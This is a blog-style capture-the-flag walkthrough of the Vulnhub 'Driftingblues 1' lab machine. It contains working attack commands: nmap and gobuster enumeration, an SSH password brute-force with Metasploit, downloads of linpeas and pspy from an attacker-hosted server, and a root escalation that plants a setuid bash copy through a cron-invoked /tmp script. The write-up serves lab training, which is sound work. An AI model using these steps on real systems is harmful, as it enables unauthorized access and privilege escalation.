Vulnhub – Driftingblues 1 – Walkthrough – Writeup

We are going to exploit the driftingblues1 machine of Vulnhub. Our goal is to capture user and root flags. Also, make sure to check out the walkthroughs on the harry potter series.

Foothold

fping

fping -aqg 10.0.2.0/24

nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.9 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.0.2.9

gobuster dir

gobuster dir -u http://10.0.2.9 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

We have secret.html and index.html files. So, we can open them in browsers or use curl for the sake of saving time.

curl

curl http://10.0.2.9/index.html

There is an email `sheryl@driftingblues.box. So, we might speculate that there is a user sheryl and the hostname of the server is driftingblues.box. We have to add that to hosts file. Meanwhile, let’s find some other information from the page.

echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d 

Information gathered from the page:

  1. The hostname is driftingblues.box
  2. There are two users eric and sheryl.
  3. There is another path in the URL /noteforkingfish.txt.

Let’s check the path /secret.html.

curl http://10.0.2.9/secret.html

It just tells us to dig deeper. We will!

Add to hosts file

sudo vi /etc/hosts

Open /noteforkingfish.txt

curl http://driftingblues.box/noteforkingfish.txt

I am afraid now seeing these Ook messages with different punctuations. Maybe it’s some encoded message. We will search the internet for this.

I used another website to decode the message. https://www.geocachingtoolbox.com/index.php

This means, we haven’t yet identified the secret location which seems to be some subdomain of driftingblues.box. We can enumerate virtual hosts using gobuster.

gobuster – vhost

gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt

We found out a vhost test.driftingblues.box. Hence, we will also be adding this host to our hosts file.

sudo vi /etc/hosts

Now, we will curl to the newly found url.

curl http://test.driftingblues.box

Let’s enumerate on the this host using ZAP or nikto whichever you feel comfortable with.

nikto -h http://test.driftingblues.box/

We saw that /ssh_cred.txt is giving us 200 OK status. Let’s visit that file from firefox.

Now, we know the format of the password. However, there needs to be a digit at the end of it. So, we have to brute-force to get entry. For this, we can simply create a wordlist using a script (bash or python or any) or manually whichever is faster for you.

for i in {0..9}; do echo 1<snip>y${i};done | tee wordlist

Also, during our initial enumeration we found out there are two users – eric and sheryl. Hence, we are going to perform brute-force for these users using metasploit framework.

msfconsole

msfconsole
use auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts 10.0.2.9
set verbose true
run

We found out the password of user eric.

Privilege User – eric

Now, we can do ssh with the credentials.

ssh eric@10.0.2.9

Privilege Root

I will be using my two favourite tools, linpeas.sh and pspy to enumerate further. linpeas.sh does a Linux enumeration whereas pspy does unthenticated process snooping. For that to work, you have to create server on the local machine and serve those file.

On attacker (local) machine:

python -m http.server 8080

On target machine:

./linpeas.sh | tee output
wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh
wget http://10.0.2.15:8080/pspy64
chmod +x pspy64

We found out the cron job. Also, there might be another vulnerability in sudo version.

pspy

./pspy64

On running pspy64 we found out that there is a backup script running every minute and also it is invoking another script from /tmp directory.

Now, let’s examine the backup.sh script.

cat /var/backups/backup.sh

The backup.zip file which we saw earlier in the linpeas.sh enumeration is a result of this script. Also, the developer has included a backdoor in the script. Now, it’s easy to get another shell, or reverse shell, or we can add ssh entry, or we can also change the password of the root user. We have infinite possibilities. For this, we just have to update /tmp/emergency file and make it executable.

Add a custom bash

nano /tmp/emergency
chmod +x /tmp/emergency
#!/bin/bash

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

The above line copies the binary bash and gives the setuid permission to it. Therefore, when root executes this line, we will get a copy of bash with setuid permission of root. Then, we can simply put -p flag and impersonate root.

./pspy64

Now, we can try to impersonate the root user.

/tmp/bash -p

We got the root access.

cat /root/root.txt

We got the root flag.

Conclusion

I learnt about Ook encoding from this machine. Other than that, we got to use gobuster vhost enumeration. Since the machine was labelled as easy, it is easy. I will do driftingblues2 soon.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments